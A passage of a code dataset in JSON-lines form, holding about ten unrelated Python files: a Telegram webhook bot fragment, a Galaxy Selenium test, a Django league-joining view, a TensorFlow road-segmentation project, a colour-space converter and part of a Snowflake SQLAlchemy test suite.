'bot': self.bot\n }\n self.sdk.db.insert(CHATS_COLLECTION_NAME, new_chat)\n self.sdk.log(\"New user registered with token {}\".format(user_token))\n\n message = \"Use this webhook for sending notifications to the chat:\\n\" \\\n \"\\n\" \\\n \"{}/u/{}\\n\" \\\n \"\\n\" \\\n \"Make a POST request with text in «message» param.\"\n\n await self.send(\n payload[\"chat\"],\n message.format(URL, user_token),\n \"HTML\"\n )\n\n @staticmethod\n def generate_user_token():\n return ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(8))\n"} {"ext": "py", "sha": "1a2fd4e0b8c7ae7228d7768503d24b8a68d0a440", "content": "import unittest\n\nfrom .framework import selenium_test, SeleniumTestCase\n\n\nclass ToolDescribingToursTestCase(SeleniumTestCase):\n\n def setUp(self):\n super().setUp()\n self.home()\n\n @selenium_test\n def test_generate_tour_no_data(self):\n \"\"\"Ensure a tour without data is generated and pops up.\"\"\"\n self._ensure_tdt_available()\n\n self.tool_open('environment_variables')\n\n self.tool_form_generate_tour()\n\n popover_component = self.components.tour.popover._\n popover_component.wait_for_visible()\n\n title = popover_component.title.wait_for_visible().text\n assert title == \"environment_variables Tour\", title\n\n # Run tool\n self.tool_form_execute()\n self.history_panel_wait_for_hid_ok(1)\n\n @selenium_test\n def test_generate_tour_with_data(self):\n \"\"\"Ensure a tour with data populates history.\"\"\"\n self._ensure_tdt_available()\n\n self.tool_open('md5sum')\n\n self.tool_form_generate_tour()\n\n self.history_panel_wait_for_hid_ok(1)\n\n popover_component = self.components.tour.popover._\n popover_component.wait_for_visible()\n\n title = popover_component.title.wait_for_visible().text\n assert title == \"md5sum Tour\", title\n self.screenshot(\"tool_describing_tour_0_start\")\n\n popover_component.next.wait_for_and_click()\n\n self.sleep_for(self.wait_types.UX_RENDER)\n\n text = popover_component.content.wait_for_visible().text\n assert \"Select dataset\" in text, text\n self.screenshot(\"tool_describing_tour_1_select\")\n\n 
popover_component.next.wait_for_and_click()\n\n self.sleep_for(self.wait_types.UX_RENDER)\n\n title = popover_component.title.wait_for_visible().text\n assert title == \"Execute tool\"\n self.screenshot(\"tool_describing_tour_2_execute\")\n\n popover_component.end.wait_for_and_click()\n popover_component.wait_for_absent_or_hidden()\n\n # Run tool\n self.tool_form_execute()\n self.history_panel_wait_for_hid_ok(2)\n self.screenshot(\"tool_describing_tour_3_after_execute\")\n\n def _ensure_tdt_available(self):\n \"\"\" Skip a test if the webhook TDT doesn't appear. \"\"\"\n response = self.api_get('webhooks', raw=True)\n self.assertEqual(response.status_code, 200)\n data = response.json()\n webhooks = [x['id'] for x in data]\n if 'tour_generator' not in webhooks:\n raise unittest.SkipTest('Skipping test, webhook \"Tool-Describing-Tours\" doesn\\'t appear to be configured.')\n"} {"ext": "py", "sha": "1a2fd5114444d7e16b700dc1146c193c859ccf76", "content": "#!/usr/bin/env python\nimport fileinput\n\njumps = [int(jump) for jump in fileinput.input()]\n\nclock, pc, max_pc = 0, 0, 0\nwhile pc < len(jumps):\n jump = jumps[pc]\n jumps[pc] += 1\n pc += jump\n clock += 1\n if pc > max_pc:\n max_pc = pc\n print(\"%09d: %04d\" % (clock, pc))\n\nprint(clock)\n"} {"ext": "py", "sha": "1a2fd5154fb5ea99a0ee7df2a192dfa2d82c21de", "content": "from django.contrib import messages\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.urls import reverse_lazy\nfrom django.shortcuts import redirect\nfrom django.views.generic import CreateView, FormView\n\nfrom ..forms import CreateBoaLeagueForm, JoinBoaLeagueForm\nfrom ..models import League, Manager\n\n\nclass JoinLeague(LoginRequiredMixin, CreateView):\n model = Manager\n form_class = JoinBoaLeagueForm\n http_method_names = [u'get', u'post']\n template_name = 'boa/join_league.html'\n object = None\n\n def get(self, request, *args, **kwargs):\n context = {}\n my_league_id = kwargs['pk']\n league = League.objects.get(id=my_league_id)\n\n if league.password:\n form = JoinBoaLeagueForm(pw=True)\n else:\n form = JoinBoaLeagueForm(pw=False)\n\n context.update({\n 'league': league,\n 'form': form,\n })\n return self.render_to_response(context)\n\n def get_success_url(self):\n return self.object.league.get_absolute_url()\n\n def post(self, request, *args, **kwargs):\n print(request.POST)\n\n my_league_id = kwargs['pk']\n league = League.objects.get(id=my_league_id)\n\n has_password = bool(league.password)\n form = JoinBoaLeagueForm(request.POST, pw=has_password)\n\n if form.is_valid():\n\n manager = form.save(commit=False)\n manager.league = league\n manager.user = self.request.user\n\n # check password\n if league.password and not('password' in form.cleaned_data\n and form.cleaned_data['password'] == league.password):\n form.add_error(\n None,\n f'Invalid password.'\n )\n return self.form_invalid(form)\n\n #check team count\n if Manager.objects.filter(league=league).count() >= league.max_teams_per_league:\n form.add_error(\n None,\n f'This league is full.'\n )\n return self.form_invalid(form)\n\n #check if already in league and team name\n for other_manager in Manager.objects.filter(league=league):\n if manager.user == other_manager.user:\n form.add_error(\n None,\n f'You already manage a team in this league'\n )\n return self.form_invalid(form)\n\n if manager.name == other_manager.name:\n form.add_error(\n None,\n f'There is already a team named {manager.name} in this league'\n )\n return self.form_invalid(form)\n\n manager.save()\n\n 
messages.success(\n request,\n f'Successfully joined league {league}'\n )\n return self.form_valid(form)\n else:\n return self.form_invalid(form)\n"} {"ext": "py", "sha": "1a2fd57ef5f3ecb75738f551fdb7c30b59a4b6ff", "content": "# vim:ts=4:sts=4:sw=4:expandtab\n\"\"\"Matching Clients with event queues.\n\"\"\"\n\n\nimport collections\n\nfrom satori.objects import Object\nfrom satori.events.misc import Namespace\n\n\nclass Dispatcher(Object):\n \"\"\"Abstract. Dispatches Events to Clients.\n \"\"\"\n\n def __init__(self):\n self.queues = dict()\n self.clients = dict()\n\n def _qdata(self, queue_id):\n if queue_id not in self.queues:\n qdata = Namespace()\n qdata.references = 0\n qdata.events = collections.deque()\n qdata.clients = collections.deque()\n self.queues[queue_id] = qdata\n return self.queues[queue_id]\n\n def _cdata(self, client):\n if client not in self.clients:\n cdata = Namespace()\n cdata.queue_ids = set()\n cdata.active = False\n self.clients[client] = cdata\n return self.clients[client]\n\n def attach(self, client, queue_id):\n \"\"\"Declare Client's interest in events from a given queue.\n \"\"\"\n qdata = self._qdata(queue_id)\n cdata = self._cdata(client)\n if queue_id not in cdata.queue_ids:\n cdata.queue_ids.add(queue_id)\n qdata.references += 1\n\n def detach(self, client, queue_id):\n \"\"\"Revoke Client's interest in events from a given queue.\n \"\"\"\n qdata = self._qdata(queue_id)\n cdata = self._cdata(client)\n if queue_id in cdata.queues:\n cdata.queue_ids.remove(queue_id)\n qdata.references -= 1\n if qdata.references == 0:\n yield queue_id\n del self.queues[queue_id]\n\n def activate(self, client):\n \"\"\"Mark a Client as ready to receive a (single) event.\n \"\"\"\n cdata = self._cdata(client)\n best = None\n for queue_id in cdata.queue_ids:\n qdata = self._qdata(queue_id)\n if len(qdata.events) > 0:\n event = qdata.events[0]\n if best is None or best[1] > event.serial:\n best = (queue_id, event.serial)\n if best is not None:\n qdata = self._qdata(best[0])\n client.sendResponse((best[0], qdata.events.popleft()))\n return\n for queue_id in cdata.queue_ids:\n qdata = self._qdata(queue_id)\n qdata.clients.append(client)\n cdata.active = True\n\n def enqueue(self, queue_id, event):\n \"\"\"Add a new event to a given queue.\n \"\"\"\n qdata = self._qdata(queue_id)\n qdata.events.append(event)\n while len(qdata.clients) > 0:\n client = qdata.clients.popleft()\n cdata = self._cdata(client)\n if not cdata.active:\n continue\n if queue_id not in cdata.queue_ids:\n continue\n cdata.active = False\n client.sendResponse((queue_id, qdata.events.popleft()))\n return\n"} {"ext": "py", "sha": "1a2fd5b5d2ad163433446939e5563b3bda14e61b", "content": "import os.path\nimport tensorflow as tf\nimport helper\nimport warnings\nfrom distutils.version import LooseVersion\nimport project_tests as tests\n\n# Check TensorFlow Version\nassert LooseVersion(tf.__version__) >= LooseVersion(\n '1.0'), 'Please use TensorFlow version 1.0 or newer. You are using {}'.format(tf.__version__)\nprint('TensorFlow Version: {}'.format(tf.__version__))\n\n# Check for a GPU\nif not tf.test.gpu_device_name():\n warnings.warn('No GPU found. 
Please use a GPU to train your neural network.')\nelse:\n print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))\n\n\ndef load_vgg(sess, vgg_path):\n \"\"\"\n Load Pretrained VGG Model into TensorFlow.\n :param sess: TensorFlow Session\n :param vgg_path: Path to vgg folder, containing \"variables/\" and \"saved_model.pb\"\n :return: Tuple of Tensors from VGG model (image_input, keep_prob, layer3_out, layer4_out, layer7_out)\n \"\"\"\n # TODO: Implement function\n # Use tf.saved_model.loader.load to load the model and weights\n vgg_tag = 'vgg16'\n vgg_input_tensor_name = 'image_input:0'\n vgg_keep_prob_tensor_name = 'keep_prob:0'\n vgg_layer3_out_tensor_name = 'layer3_out:0'\n vgg_layer4_out_tensor_name = 'layer4_out:0'\n vgg_layer7_out_tensor_name = 'layer7_out:0'\n\n ## pretrain\n tf.saved_model.loader.load(sess, [vgg_tag], vgg_path)\n\n ## extract layers\n graph = tf.get_default_graph()\n image_input = graph.get_tensor_by_name(vgg_input_tensor_name)\n keep_prob = tf.get_default_graph().get_tensor_by_name(vgg_keep_prob_tensor_name)\n layer3_out = tf.get_default_graph().get_tensor_by_name(vgg_layer3_out_tensor_name)\n layer4_out = tf.get_default_graph().get_tensor_by_name(vgg_layer4_out_tensor_name)\n layer7_out = tf.get_default_graph().get_tensor_by_name(vgg_layer7_out_tensor_name)\n\n return image_input, keep_prob, layer3_out, layer4_out, layer7_out\n\n\ntests.test_load_vgg(load_vgg, tf)\n\n\ndef layers(vgg_layer3_out, vgg_layer4_out, vgg_layer7_out, num_classes):\n \"\"\"\n Create the layers for a fully convolutional network. Build skip-layers using the vgg layers.\n :param vgg_layer7_out: TF Tensor for VGG Layer 3 output\n :param vgg_layer4_out: TF Tensor for VGG Layer 4 output\n :param vgg_layer3_out: TF Tensor for VGG Layer 7 output\n :param num_classes: Number of classes to classify\n :return: The Tensor for the last layer of output\n \"\"\"\n # TODO: Implement function\n\n # 1x1 convolution of vgg layer 7\n layer7_conv_1x1 = tf.layers.conv2d(vgg_layer7_out, num_classes, 1,\n padding='same',\n kernel_initializer=tf.random_normal_initializer(stddev=0.01),\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n # upsample\n layer7_out = tf.layers.conv2d_transpose(layer7_conv_1x1, num_classes, 4,\n strides=(2, 2),\n padding='same',\n kernel_initializer=tf.random_normal_initializer(stddev=0.01),\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n # 1x1 convolution of vgg layer 4\n layer4_conv_1x1 = tf.layers.conv2d(vgg_layer4_out, num_classes, 1,\n padding='same',\n kernel_initializer=tf.random_normal_initializer(stddev=0.01),\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n\n layer4_skip_conns = tf.add(layer7_out, layer4_conv_1x1)\n layer4_out = tf.layers.conv2d_transpose(layer4_skip_conns, num_classes, 4,\n strides=(2, 2),\n padding='same',\n kernel_initializer=tf.random_normal_initializer(stddev=0.01),\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n # 1x1 convolution of vgg layer 3\n layer3_conv_1x1 = tf.layers.conv2d(vgg_layer3_out, num_classes, 1,\n padding='same',\n kernel_initializer=tf.random_normal_initializer(stddev=0.01),\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n layer3_skip_conns = tf.add(layer4_out, layer3_conv_1x1)\n layer3_out = tf.layers.conv2d_transpose(layer3_skip_conns, num_classes, 16,\n strides=(8, 8),\n padding='same',\n kernel_initializer=tf.random_normal_initializer(stddev=0.01),\n kernel_regularizer=tf.contrib.layers.l2_regularizer(1e-3))\n return 
layer3_out\n\n\ntests.test_layers(layers)\n\n\ndef optimize(nn_last_layer, correct_label, learning_rate, num_classes):\n \"\"\"\n Build the TensorFLow loss and optimizer operations.\n :param nn_last_layer: TF Tensor of the last layer in the neural network\n :param correct_label: TF Placeholder for the correct label image\n :param learning_rate: TF Placeholder for the learning rate\n :param num_classes: Number of classes to classify\n :return: Tuple of (logits, train_op, cross_entropy_loss)\n \"\"\"\n # TODO: Implement function\n\n logits = tf.reshape(nn_last_layer, (-1, num_classes))\n correct_label = tf.reshape(correct_label, (-1, num_classes))\n\n # Loss function\n cross_entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=correct_label))\n\n # Training operation\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n train_op = optimizer.minimize(cross_entropy_loss)\n\n return logits, train_op, cross_entropy_loss\n\n\ntests.test_optimize(optimize)\n\n\ndef train_nn(sess, epochs, batch_size, get_batches_fn, train_op, cross_entropy_loss, input_image,\n correct_label, keep_prob, learning_rate):\n \"\"\"\n Train neural network and print out the loss during training.\n :param sess: TF Session\n :param epochs: Number of epochs\n :param batch_size: Batch size\n :param get_batches_fn: Function to get batches of training data. Call using get_batches_fn(batch_size)\n :param train_op: TF Operation to train the neural network\n :param cross_entropy_loss: TF Tensor for the amount of loss\n :param input_image: TF Placeholder for input images\n :param correct_label: TF Placeholder for label images\n :param keep_prob: TF Placeholder for dropout keep probability\n :param learning_rate: TF Placeholder for learning rate\n \"\"\"\n # TODO: Implement function\n sess.run(tf.global_variables_initializer())\n\n print(\"Training Neural Network\\n\\n\")\n for itr in range(epochs):\n print(\"Epoch No. 
{}\".format(itr + 1))\n for image, label in get_batches_fn(batch_size):\n _, loss = sess.run([train_op, cross_entropy_loss],\n feed_dict={input_image: image, correct_label: label, keep_prob: 0.5,\n learning_rate: 0.0009})\n print(\"Training Loss: {:.3f}\".format(loss))\n print()\n\n\ntests.test_train_nn(train_nn)\n\n\ndef run():\n num_classes = 2\n image_shape = (160, 576)\n data_dir = './data'\n runs_dir = './runs'\n tests.test_for_kitti_dataset(data_dir)\n\n # Download pretrained vgg model\n helper.maybe_download_pretrained_vgg(data_dir)\n\n # OPTIONAL: Train and Inference on the cityscapes dataset instead of the Kitti dataset.\n # You'll need a GPU with at least 10 teraFLOPS to train on.\n # https://www.cityscapes-dataset.com/\n\n with tf.Session() as sess:\n # Path to vgg model\n vgg_path = os.path.join(data_dir, 'vgg')\n # Create function to get batches\n get_batches_fn = helper.gen_batch_function(os.path.join(data_dir, 'data_road/training'), image_shape)\n\n # OPTIONAL: Augment Images for better results\n # https://datascience.stackexchange.com/questions/5224/how-to-prepare-augment-images-for-neural-network\n\n # Build NN using load_vgg, layers, and optimize function\n\n BATCH_SIZE = 5\n EPOCHS = 50\n\n # Placeholders for Tensorflow\n correct_label = tf.placeholder(tf.int32, [None, None, None, num_classes], name='correct_label')\n learning_rate = tf.placeholder(tf.float32, name='learning_rate')\n\n input_image, keep_prob, layer3_out, layer4_out, layer7_out = load_vgg(sess, vgg_path)\n\n last_layer_out = layers(layer3_out, layer4_out, layer7_out, num_classes)\n\n logits, train_op, cross_entropy_loss = optimize(last_layer_out, correct_label, learning_rate, num_classes)\n\n # Train NN using the train_nn function\n train_nn(sess, EPOCHS, BATCH_SIZE, get_batches_fn, train_op, cross_entropy_loss, input_image,\n correct_label, keep_prob, learning_rate)\n\n # Save inference data using helper.save_inference_samples\n helper.save_inference_samples(runs_dir, data_dir, sess, image_shape, logits, keep_prob, input_image)\n\n # OPTIONAL: Apply the trained model to a video\n\n\nif __name__ == '__main__':\n run()"} {"ext": "py", "sha": "1a2fd60e4d1beee6888ddba7ed6af1def3c7d255", "content": "import logging\nlog = logging.getLogger('onegov.form') # noqa\nlog.addHandler(logging.NullHandler()) # noqa\n\nfrom translationstring import TranslationStringFactory\n_ = TranslationStringFactory('onegov.form') # noqa\n\nfrom onegov.form.collection import (\n FormCollection,\n FormSubmissionCollection,\n FormDefinitionCollection\n)\nfrom onegov.form.core import (\n FieldDependency,\n Form,\n merge_forms,\n move_fields,\n)\nfrom onegov.form.display import render_field\nfrom onegov.form.extensions import FormExtension, Extendable\nfrom onegov.form.integration import FormApp\nfrom onegov.form.models import (\n FormDefinition,\n FormFile,\n FormSubmission,\n FormRegistrationWindow,\n PendingFormSubmission,\n CompleteFormSubmission\n)\nfrom onegov.form.parser import find_field\nfrom onegov.form.parser import flatten_fieldsets\nfrom onegov.form.parser import parse_form\nfrom onegov.form.parser import parse_formcode\nfrom onegov.form.parser import WTFormsClassBuilder\nfrom onegov.form.utils import decimal_range, as_internal_id, with_options\n\n__all__ = [\n 'as_internal_id',\n 'CompleteFormSubmission',\n 'decimal_range',\n 'find_field',\n 'flatten_fieldsets',\n 'Extendable',\n 'FieldDependency',\n 'Form',\n 'FormApp',\n 'FormCollection',\n 'FormDefinition',\n 'FormDefinitionCollection',\n 'FormExtension',\n 'FormFile',\n 
'FormRegistrationWindow',\n 'FormSubmission',\n 'FormSubmissionCollection',\n 'merge_forms',\n 'move_fields',\n 'parse_form',\n 'parse_formcode',\n 'PendingFormSubmission',\n 'render_field',\n 'with_options',\n 'WTFormsClassBuilder',\n]\n"} {"ext": "py", "sha": "1a2fd613b9bdb475afb052b7c1456d1191c09bb1", "content": "\"\"\"Base email backend class.\"\"\"\n\nclass BaseEmailBackend(object):\n \"\"\"\n Base class for email backend implementations.\n\n Subclasses must at least overwrite send_messages().\n \"\"\"\n def __init__(self, fail_silently=False, **kwargs):\n self.fail_silently = fail_silently\n\n def open(self, callback=False):\n \"\"\"Open a network connection.\n\n This method can be overwritten by backend implementations to\n open a network connection.\n\n It's up to the backend implementation to track the status of\n a network connection if it's needed by the backend.\n\n This method can be called by applications to force a single\n network connection to be used when sending mails. See the\n send_messages() method of the SMTP backend for a reference\n implementation.\n\n The default implementation does nothing.\n \"\"\"\n pass\n\n def close(self):\n \"\"\"Close a network connection.\"\"\"\n pass\n\n def send_messages(self, email_messages, callback=False):\n \"\"\"\n Sends one or more EmailMessage objects and returns the number of email\n messages sent.\n \"\"\"\n raise NotImplementedError\n"} {"ext": "py", "sha": "1a2fd7440c6a08e2a23e68232183b39370f64bad", "content": "# -*- coding: utf-8 -*-\n#\nimport numpy\n\nfrom . import cielab\nfrom .illuminants import whitepoints_cie1931\n\n\nclass CIELCH(object):\n def __init__(self, whitepoint=whitepoints_cie1931['D65']):\n self.cielab = cielab.CIELAB(whitepoint=whitepoint)\n return\n\n def from_xyz100(self, xyz):\n L, u, v = self.cielab.from_xyz100(xyz)\n C = numpy.hypot(u, v)\n h = numpy.mod(numpy.arctan2(v, u), 2*numpy.pi) / numpy.pi * 180\n return numpy.array([L, C, h])\n\n def to_xyz100(self, lch):\n L, C, h = lch\n h_ = h * numpy.pi / 180\n lab = numpy.array([L, C * numpy.cos(h_), C * numpy.sin(h_)])\n return self.cielab.to_xyz100(lab)\n"} {"ext": "py", "sha": "1a2fd90970a101f64c169389990865b6d19a55bc", "content": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2012-2019 Snowflake Computing Inc. 
All right reserved.\n#\nimport os\nimport random\nimport re\nimport string\nimport time\n\nimport pytest\nfrom conftest import get_engine\nfrom mock import patch\nfrom parameters import CONNECTION_PARAMETERS\nfrom snowflake.connector import ProgrammingError, connect\nfrom snowflake.sqlalchemy import URL, MergeInto, dialect\nfrom sqlalchemy import (\n REAL,\n Boolean,\n Column,\n DateTime,\n ForeignKey,\n Integer,\n LargeBinary,\n MetaData,\n Numeric,\n Sequence,\n String,\n Table,\n create_engine,\n dialects,\n inspect,\n text,\n)\nfrom sqlalchemy.sql import and_, not_, or_, select\n\ntry:\n from parameters import (CONNECTION_PARAMETERS2)\nexcept ImportError:\n CONNECTION_PARAMETERS2 = CONNECTION_PARAMETERS\n\nTHIS_DIR = os.path.dirname(os.path.realpath(__file__))\n\n\ndef _create_users_addresses_tables(engine_testaccount, metadata, fk=None):\n users = Table('users', metadata,\n Column('id', Integer, Sequence('user_id_seq'),\n primary_key=True),\n Column('name', String),\n Column('fullname', String),\n )\n\n addresses = Table('addresses', metadata,\n Column('id', Integer, Sequence('address_id_seq'),\n primary_key=True),\n Column('user_id', None,\n ForeignKey('users.id', name=fk)),\n Column('email_address', String, nullable=False)\n )\n metadata.create_all(engine_testaccount)\n return users, addresses\n\n\ndef _create_users_addresses_tables_without_sequence(engine_testaccount,\n metadata):\n users = Table('users', metadata,\n Column('id', Integer, primary_key=True),\n Column('name', String),\n Column('fullname', String),\n )\n\n addresses = Table('addresses', metadata,\n Column('id', Integer, primary_key=True),\n Column('user_id', None, ForeignKey('users.id')),\n Column('email_address', String, nullable=False)\n )\n metadata.create_all(engine_testaccount)\n return users, addresses\n\n\ndef test_connect_args():\n \"\"\"\n Tests connect string\n\n Snowflake connect string supports account name as a replacement of\n host:port\n \"\"\"\n from sqlalchemy import create_engine\n engine = create_engine(\n 'snowflake://{user}:{password}@{account}/{database}/{schema}'.format(\n user=CONNECTION_PARAMETERS2['user'],\n password=CONNECTION_PARAMETERS2['password'],\n account=CONNECTION_PARAMETERS2['account'],\n database=CONNECTION_PARAMETERS2['database'],\n schema=CONNECTION_PARAMETERS2['schema'],\n )\n )\n try:\n results = engine.execute('select current_version()').fetchone()\n assert results is not None\n finally:\n engine.dispose()\n\n engine = create_engine(\n 'snowflake://{user}:{password}@{account}/'.format(\n user=CONNECTION_PARAMETERS2['user'],\n password=CONNECTION_PARAMETERS2['password'],\n account=CONNECTION_PARAMETERS2['account'],\n )\n )\n try:\n results = engine.execute('select current_version()').fetchone()\n assert results is not None\n finally:\n engine.dispose()\n\n engine = create_engine(URL(\n user=CONNECTION_PARAMETERS2['user'],\n password=CONNECTION_PARAMETERS2['password'],\n account=CONNECTION_PARAMETERS2['account'],\n )\n )\n try:\n results = engine.execute('select current_version()').fetchone()\n assert results is not None\n finally:\n engine.dispose()\n\n engine = create_engine(URL(\n user=CONNECTION_PARAMETERS2['user'],\n password=CONNECTION_PARAMETERS2['password'],\n account=CONNECTION_PARAMETERS2['account'],\n warehouse='testwh'\n )\n )\n try:\n results = engine.execute('select current_version()').fetchone()\n assert results is not None\n finally:\n engine.dispose()\n\n\ndef test_simple_sql(engine_testaccount):\n \"\"\"\n Simple SQL by SQLAlchemy\n \"\"\"\n result = 
engine_testaccount.execute('show databases')\n rows = [row for row in result]\n assert len(rows) >= 0, 'show database results'\n\n\ndef test_create_drop_tables(engine_testaccount):\n \"\"\"\n Creates and Drops tables\n \"\"\"\n metadata = MetaData()\n users, addresses = _create_users_addresses_tables_without_sequence(\n engine_testaccount, metadata)\n\n try:\n # validate the tables exists\n results = engine_testaccount.execute('desc table users')\n assert len([row for row in results]) > 0, \"users table doesn't exist\"\n\n # validate the tables exists\n results = engine_testaccount.execute('desc table addresses')\n assert len([row for row in results]) > 0, \\\n \"addresses table doesn't exist\"\n finally:\n # drop tables\n addresses.drop(engine_testaccount)\n users.drop(engine_testaccount)\n\n\ndef test_insert_tables(engine_testaccount):\n \"\"\"\n Inserts data into tables\n \"\"\"\n metadata = MetaData()\n users, addresses = _create_users_addresses_tables(\n engine_testaccount, metadata)\n\n conn = engine_testaccount.connect()\n try:\n # inserts data with an implicitly generated id\n ins = users.insert().values(name='jack', fullname='Jack Jones')\n results = engine_testaccount.execute(ins)\n assert results.inserted_primary_key == [1], 'sequence value'\n results.close()\n\n # inserts data with the given id\n ins = users.insert()\n conn.execute(ins, id=2, name='wendy', fullname='Wendy Williams')\n\n # verify the results\n s = select([users])\n results = conn.execute(s)\n assert len([row for row in results]) == 2, \\\n 'number of rows from users table'\n results.close()\n\n # fetchone\n s = select([users]).order_by('id')\n results = conn.execute(s)\n row = results.fetchone()\n results.close()\n assert row[2] == 'Jack Jones', 'user name'\n assert row['fullname'] == 'Jack Jones', \"user name by dict\"\n assert row[users.c.fullname] == 'Jack Jones', \\\n 'user name by Column object'\n\n conn.execute(addresses.insert(), [\n {'user_id': 1, 'email_address': 'jack@yahoo.com'},\n {'user_id': 1, 'email_address': 'jack@msn.com'},\n {'user_id': 2, 'email_address': 'www@www.org'},\n {'user_id': 2, 'email_address': 'wendy@aol.com'},\n ])\n\n # more records\n s = select([addresses])\n results = conn.execute(s)\n assert len([row for row in results]) == 4, \\\n 'number of rows from addresses table'\n results.close()\n\n # select specified column names\n s = select([users.c.name, users.c.fullname]).order_by('name')\n results = conn.execute(s)\n results.fetchone()\n row = results.fetchone()\n assert row['name'] == 'wendy', 'name'\n\n # join\n s = select([users, addresses]).where(users.c.id == addresses.c.user_id)\n results = conn.execute(s)\n results.fetchone()\n results.fetchone()\n results.fetchone()\n row = results.fetchone()\n assert row['email_address'] == 'wendy@aol.com', 'email address'\n\n # Operator\n assert str(users.c.id == addresses.c.user_id) == \\\n 'users.id = addresses.user_id', 'equal operator'\n assert str(users.c.id == 7) == 'users.id = :id_1', \\\n 'equal to a static number'\n assert str(users.c.name == None) # NOQA\n assert str(users.c.id + addresses.c.id) == 'users.id + addresses.id', \\\n 'number + number'\n assert str(users.c.name + users.c.fullname) == \\\n 'users.name || users.fullname', 'str + str'\n\n # Conjunctions\n # example 1\n obj = and_(\n users.c.name.like('j%'),\n users.c.id == addresses.c.user_id,\n or_(\n addresses.c.email_address == 'wendy@aol.com',\n addresses.c.email_address == 'jack@yahoo.com'\n ),\n not_(users.c.id > 5)\n )\n expected_sql = \"\"\"users.name LIKE 
:name_1\n AND users.id = addresses.user_id\n AND (addresses.email_address = :email_address_1\n OR addresses.email_address = :email_address_2)\n AND users.id <= :id_1\"\"\"\n assert str(obj) == ''.join(expected_sql.split('\\n')), \\\n \"complex condition\"\n\n # example 2\n obj = users.c.name.like('j%') & (users.c.id == addresses.c.user_id) & \\\n (\n (addresses.c.email_address == 'wendy@aol.com') |\n (addresses.c.email_address == 'jack@yahoo.com')\n ) \\\n & ~(users.c.id > 5)\n assert str(obj) == ''.join(expected_sql.split('\\n')), \\\n \"complex condition using python operators\"\n\n # example 3\n s = select([(users.c.fullname +\n \", \" + addresses.c.email_address).\n label('title')]). \\\n where(\n and_(\n users.c.id == addresses.c.user_id,\n users.c.name.between('m', 'z'),\n or_(\n addresses.c.email_address.like('%@aol.com'),\n addresses.c.email_address.like('%@msn.com')\n )\n )\n\n )\n results = engine_testaccount.execute(s).fetchall()\n assert results[0][0] == 'Wendy Williams, wendy@aol.com'\n\n # Aliases\n a1 = addresses.alias()\n a2 = addresses.alias()\n s = select([users]).where(and_(\n users.c.id == a1.c.user_id,\n users.c.id == a2.c.user_id,\n a1.c.email_address == 'jack@msn.com',\n a2.c.email_address == 'jack@yahoo.com'))\n results = engine_testaccount.execute(s).fetchone()\n assert results == (1, 'jack', 'Jack Jones')\n\n # Joins\n assert str(users.join(addresses)) == 'users JOIN addresses ON ' \\\n 'users.id = addresses.user_id'\n assert str(users.join(addresses,\n addresses.c.email_address.like(\n users.c.name + '%'))) == \\\n 'users JOIN addresses ' \\\n 'ON addresses.email_address LIKE users.name || :name_1'\n\n s = select([users.c.fullname]).select_from(\n users.join(addresses,\n addresses.c.email_address.like(users.c.name + '%')))\n results = engine_testaccount.execute(s).fetchall()\n assert results[1] == ('Jack Jones',)\n\n s = select([users.c.fullname]).select_from(users.outerjoin(\n addresses)).order_by(users.c.fullname)\n results = engine_testaccount.execute(s).fetchall()\n assert results[-1] == ('Wendy Williams',)\n finally:\n conn.close()\n # drop tables\n addresses.drop(engine_testaccount)\n users.drop(engine_testaccount)\n\n\n@pytest.mark.skip(\"\"\"\nReflection is not implemented yet.\n\"\"\")\ndef test_reflextion(engine_testaccount):\n \"\"\"\n Tests Reflection\n \"\"\"\n engine_testaccount.execute(\"\"\"\nCREATE OR REPLACE TABLE user (\n id Integer primary key,\n name String,\n fullname String\n)\n\"\"\")\n try:\n meta = MetaData()\n user_reflected = Table('user', meta, autoload=True,\n autoload_with=engine_testaccount)\n assert user_reflected.c == ['user.id', 'user.name', 'user.fullname']\n finally:\n engine_testaccount.execute(\"\"\"\nDROP TABLE IF EXISTS user\n\"\"\")\n\n\ndef test_inspect_column(engine_testaccount):\n \"\"\"\n Tests Inspect\n \"\"\"\n metadata = MetaData()\n users, addresses = _create_users_addresses_tables_without_sequence(\n engine_testaccount,\n metadata)\n try:\n inspector = inspect(engine_testaccount)\n all_table_names = inspector.get_table_names()\n assert 'users' in all_table_names\n assert 'addresses' in all_table_names\n\n columns_in_users = inspector.get_columns('users')\n\n assert columns_in_users[0]['autoincrement'], 'autoincrement'\n assert columns_in_users[0]['default'] is None, 'default'\n assert columns_in_users[0]['name'] == 'id', 'name'\n assert columns_in_users[0]['primary_key'], 'primary key'\n\n assert not columns_in_users[1]['autoincrement'], 'autoincrement'\n assert columns_in_users[1]['default'] is None, 'default'\n 
assert columns_in_users[1]['name'] == 'name', 'name'\n assert not columns_in_users[1]['primary_key'], 'primary key'\n\n assert not columns_in_users[2]['autoincrement'], 'autoincrement'\n assert columns_in_users[2]['default'] is None, 'default'\n assert columns_in_users[2]['name'] == 'fullname', 'name'\n assert not columns_in_users[2]['primary_key'], 'primary key'\n\n finally:\n addresses.drop(engine_testaccount)\n users.drop(engine_testaccount)\n\n\ndef test_get_indexes(engine_testaccount):\n \"\"\"\n Tests get indexes\n\n NOTE: Snowflake doesn't support indexes\n \"\"\"\n metadata = MetaData()\n users, addresses = _create_users_addresses_tables_without_sequence(\n engine_testaccount,\n metadata)\n try:\n inspector = inspect(engine_testaccount)\n assert inspector.get_indexes(\"users\") == []\n\n finally:\n addresses.drop(engine_testaccount)\n users.drop(engine_testaccount)\n\n\ndef test_get_primary_keys(engine_testaccount):\n \"\"\"\n Tests get primary keys\n \"\"\"\n metadata = MetaData()\n users, addresses = _create_users_addresses_tables_without_sequence(\n engine_testaccount,\n metadata)\n try:\n inspector = inspect(engine_testaccount)\n\n primary_keys = inspector.get_pk_constraint('users')\n assert primary_keys['constrained_columns'] == ['id']\n\n primary_keys = inspector.get_pk_constraint('addresses')\n 